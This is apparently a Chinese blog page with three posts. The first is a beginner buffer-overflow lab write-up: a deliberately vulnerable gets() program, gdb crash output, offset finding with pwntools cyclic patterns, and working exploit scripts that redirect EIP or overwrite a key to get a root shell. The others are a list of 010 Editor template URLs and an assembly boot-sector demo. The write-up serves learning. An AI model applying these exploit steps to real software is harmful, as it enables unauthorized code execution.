第一个溢出程序测试

学习了一下溢出,这个题目设计的是通过gets覆盖key,然后导致程序判断逻辑为true,即可获得shell。实际上不仅如此,还可以直接覆盖EIP获得shell。原文链接:https://medium.com/bugbountywriteup/learn-pwntools-step-by-step-8c96f2dba61a
原文是覆盖key,这里覆盖EIP进行尝试
#include
#include
#include
void func(int key){
char overflowme[32];
printf("overflow me : ");
gets(overflowme); // smash me!
if(key == 0xcafebabe){
system("/bin/sh");
}
else{
printf("Nah..\n");
}
}
int main(int argc, char* argv[]){
func(0xdeadbeef);
return 0;
}

首先用pwntools的
cyclic(0x100) # 生成一个0x100大小的pattern,即一个特殊的字符串
生成的目的是为了溢出以后能够一次性定位到溢出点,生成如下:
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac
然后通过gdb 运行目标程序(编译选项gcc -o bof bof.c -m32 -fno-stack-protector),
gdb-peda$ c
Continuing.
overflow me : aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac
Nah..

Program received signal SIGSEGV, Segmentation fault.
[———————————-registers———————————–]
EAX: 0x6
EBX: 0x0
ECX: 0xffffffff
EDX: 0xf7fb8870 –> 0x0
ESI: 0xf7fb7000 –> 0x1b1db0
EDI: 0xf7fb7000 –> 0x1b1db0
EBP: 0x6161616b (‘kaaa’)
ESP: 0xffffd540 (“maaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaac”…)
EIP: 0x6161616c (‘laaa’)
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[————————————-code————————————-]
Invalid $PC address: 0x6161616c
[————————————stack————————————-]
0000| 0xffffd540 (“maaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaac”…)
0004| 0xffffd544 (“naaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaac”…)
0008| 0xffffd548 (“oaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac”)
0012| 0xffffd54c (“paaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac”)
0016| 0xffffd550 (“qaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac”)
0020| 0xffffd554 (“raaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac”)
0024| 0xffffd558 (“saaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac”)
0028| 0xffffd55c (“taaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac”)
[——————————————————————————]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x6161616c in ?? () //发现溢出点
gdb-peda$
然后使用cyclic_find查找溢出点位置

>>> cyclic_find(0x6161616c)
44

可以看到溢出点在44的位置,
然后objdump -d目标程序,发现system(“/bin/sh”)的地址为:80484cc
80484cc: 68 af 85 04 08 push $0x80485af
80484d1: e8 9a fe ff ff call 8048370

然后写程序进行溢出测试
#!/usr/bin/env python
# encoding: utf-8

from pwn import *

sh = process(“/root/learnpwn/bof”)
print sh.recvline(timeout=1)
sh.sendline(“A” * 44 + p32(0x80484cc))
sh.interactive()

然后得到shell
>>> from pwn import *
>>>
>>> sh = process("/root/learnpwn/bof")
[x] Starting local process '/root/learnpwn/bof'
[+] Starting local process '/root/learnpwn/bof': pid 45949
>>> print sh.recvline(timeout=1)

 

>> sh.sendline(“A” * 44 + p32(0x80484cc))
>>> sh.interactive()
[*] Switching to interactive mode
overflow me : Nah..
whoami
root


原始方法:

ECX: 0xf7fb75a0 –> 0xfbad2288
EDX: 0xf7fb887c –> 0x0
ESI: 0xf7fb7000 –> 0x1b1db0
EDI: 0xf7fb7000 –> 0x1b1db0
EBP: 0xffffd538 (“kaaalaaamaaa”)
ESP: 0xffffd510 (“aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaa”)
EIP: 0x80484c0 (<func +37>: cmp DWORD PTR [ebp+0x8],0xcafebabe)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[————————————-code————————————-]
0x80484b7 </func><func +28>: push eax
0x80484b8 </func><func +29>: call 0x8048350 <gets @plt>
0x80484bd <func +34>: add esp,0x10
=> 0x80484c0 </func><func +37>: cmp DWORD PTR [ebp+0x8],0xcafebabe
0x80484c7 </func><func +44>: jne 0x80484db </func><func +64>
0x80484c9 </func><func +46>: sub esp,0xc
0x80484cc </func><func +49>: push 0x80485af
0x80484d1 </func><func +54>: call 0x8048370 <system @plt>
[————————————stack————————————-]
0000| 0xffffd510 (“aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaa”)
0004| 0xffffd514 (“baaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaa”)
0008| 0xffffd518 (“caaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaa”)
0012| 0xffffd51c (“daaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaa”)
0016| 0xffffd520 (“eaaafaaagaaahaaaiaaajaaakaaalaaamaaa”)
0020| 0xffffd524 (“faaagaaahaaaiaaajaaakaaalaaamaaa”)
0024| 0xffffd528 (“gaaahaaaiaaajaaakaaalaaamaaa”)
0028| 0xffffd52c (“haaaiaaajaaakaaalaaamaaa”)
[——————————————————————————]
Legend: code, data, rodata, value
0x080484c0 in func ()
gdb-peda$ p 0xffffd538
$18 = 0xffffd538
gdb-peda$ x $18+0x8
0xffffd540: “maaa”

>>> cyclic_find(“maaa”)
48

#!/usr/bin/env python
# encoding: utf-8

from pwn import *

sh = process(“/root/learnpwn/bof”)
print sh.recvline(timeout=1)
sh.sendline(“A” * 48 + p32(0xcafebabe))
sh.interactive()</system></func></gets></func>

010Editor Template 下载地址集合

http://www.sweetscape.com/010editor/templates/files/AndroidManifestTemplate.bt
http://www.sweetscape.com/010editor/templates/files/AVITemplate.bt
http://www.sweetscape.com/010editor/templates/files/BMPTemplate.bt
http://www.sweetscape.com/010editor/templates/files/CABTemplate.bt
http://www.sweetscape.com/010editor/templates/files/CAPTemplate.bt
http://www.sweetscape.com/010editor/templates/files/CDATemplate.bt
http://www.sweetscape.com/010editor/templates/files/CLASSTemplate.bt
http://www.sweetscape.com/010editor/templates/files/CRXTemplate.bt
http://www.sweetscape.com/010editor/templates/files/DBFTemplate.bt
http://www.sweetscape.com/010editor/templates/files/DEXTemplate.bt
http://www.sweetscape.com/010editor/templates/files/DMPTemplate.bt
http://www.sweetscape.com/010editor/templates/files/EDIDTemplate.bt
http://www.sweetscape.com/010editor/templates/files/ELFTemplate.bt
http://www.sweetscape.com/010editor/templates/files/EMFTemplate.bt
http://www.sweetscape.com/010editor/templates/files/EOTTemplate.bt
http://www.sweetscape.com/010editor/templates/files/EVSBTemplate.bt
http://www.sweetscape.com/010editor/templates/files/EXETemplate.bt
http://www.sweetscape.com/010editor/templates/files/exFATTemplate.bt
http://www.sweetscape.com/010editor/templates/files/FAT16Template.bt
http://www.sweetscape.com/010editor/templates/files/FLVTemplate.bt
http://www.sweetscape.com/010editor/templates/files/GeoTIFTemplate.bt
http://www.sweetscape.com/010editor/templates/files/GIFTemplate.bt
http://www.sweetscape.com/010editor/templates/files/GocleverTemplate.bt
http://www.sweetscape.com/010editor/templates/files/GPTTemplate.bt
http://www.sweetscape.com/010editor/templates/files/GZipTemplate.bt
http://www.sweetscape.com/010editor/templates/files/ICOTemplate.bt
http://www.sweetscape.com/010editor/templates/files/ISOBMFTemplate.bt
http://www.sweetscape.com/010editor/templates/files/JPGTemplate.bt
http://www.sweetscape.com/010editor/templates/files/LNKTemplate.bt
http://www.sweetscape.com/010editor/templates/files/LUKSTemplate.bt
http://www.sweetscape.com/010editor/templates/files/MachOTemplate.bt
http://www.sweetscape.com/010editor/templates/files/MBRTemplate.bt
http://www.sweetscape.com/010editor/templates/files/MIDITemplate.bt
http://www.sweetscape.com/010editor/templates/files/Mifare1kTemplate.bt
http://www.sweetscape.com/010editor/templates/files/Mifare4kTemplate.bt
http://www.sweetscape.com/010editor/templates/files/MOBITemplate.bt
http://www.sweetscape.com/010editor/templates/files/MP3Template.bt
http://www.sweetscape.com/010editor/templates/files/OGGTemplate.bt
http://www.sweetscape.com/010editor/templates/files/OscarItemTemplate.bt
http://www.sweetscape.com/010editor/templates/files/PALTemplate.bt
http://www.sweetscape.com/010editor/templates/files/PCAPTemplate.bt
http://www.sweetscape.com/010editor/templates/files/PCXTemplate.bt
http://www.sweetscape.com/010editor/templates/files/PETemplate.bt
http://www.sweetscape.com/010editor/templates/files/PDFTemplate.bt
http://www.sweetscape.com/010editor/templates/files/PNGTemplate.bt
http://www.sweetscape.com/010editor/templates/files/PNG12Template.bt
http://www.sweetscape.com/010editor/templates/files/PSFTemplate.bt
http://www.sweetscape.com/010editor/templates/files/PYCTemplate.bt
http://www.sweetscape.com/010editor/templates/files/RARTemplate.bt
http://www.sweetscape.com/010editor/templates/files/RDBTemplate.bt
http://www.sweetscape.com/010editor/templates/files/RegistryPolicyFileTemplate.bt
http://www.sweetscape.com/010editor/templates/files/RESTemplate.bt
http://www.sweetscape.com/010editor/templates/files/SHPTemplate.bt
http://www.sweetscape.com/010editor/templates/files/SHXTemplate.bt
http://www.sweetscape.com/010editor/templates/files/SRecTemplate.bt
http://www.sweetscape.com/010editor/templates/files/SSPTemplate.bt
http://www.sweetscape.com/010editor/templates/files/STLTemplate.bt
http://www.sweetscape.com/010editor/templates/files/SWFTemplate.bt
http://www.sweetscape.com/010editor/templates/files/TacxTemplate.bt
http://www.sweetscape.com/010editor/templates/files/TOCTemplate.bt
http://www.sweetscape.com/010editor/templates/files/TIFTemplate.bt
http://www.sweetscape.com/010editor/templates/files/TGATemplate.bt
http://www.sweetscape.com/010editor/templates/files/TTFTemplate.bt
http://www.sweetscape.com/010editor/templates/files/UTMPTemplate.bt
http://www.sweetscape.com/010editor/templates/files/VHDTemplate.bt
http://www.sweetscape.com/010editor/templates/files/WAVTemplate.bt
http://www.sweetscape.com/010editor/templates/files/WinhexPosTemplate.bt
http://www.sweetscape.com/010editor/templates/files/WMFTemplate.bt
http://www.sweetscape.com/010editor/templates/files/ZIPTemplate.bt

第一个汇编语言写的可启动的软盘镜像汇编源代码

	org 07c00h
	mov ax,	cs
	mov ds,	ax
	mov es,	ax
	call DispStr
	jmp $
DispStr:
	mov ax,	BootMessage
	mov bp,	ax
	mov cx,	16
	mov ax,	01301h
	mov bx,	000ch
	mov dl,	0
	int 10h
	ret
BootMessage:	db	"Hello,My Os!"
times 510-($-$$)	db 0
dw 0xaa55
times 16800-($-$$)	db 0

将上面的这个程序用NASM编译,将生成的文件重命名为 asm.img,然后用虚拟机加载即可启动并在启动界面显示Hello,My Os!,当然也可以写入软盘,来启动电脑。Hello,My Os!

Hello,My Os.binary